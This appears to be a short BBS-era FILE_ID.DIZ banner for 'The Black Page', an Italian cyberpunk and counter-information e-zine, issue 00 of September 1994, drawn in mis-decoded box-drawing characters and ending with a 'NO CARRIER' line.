ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ º La 1a rivista telematica ITALIANA º º di CYBERPUNK e CONTROINFORMAZIONE º º - The Black Page - º º - Numero 00 -- Settembre 1994 - º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ @END FILE_ID.DIZ =================================NO CARRIER=================================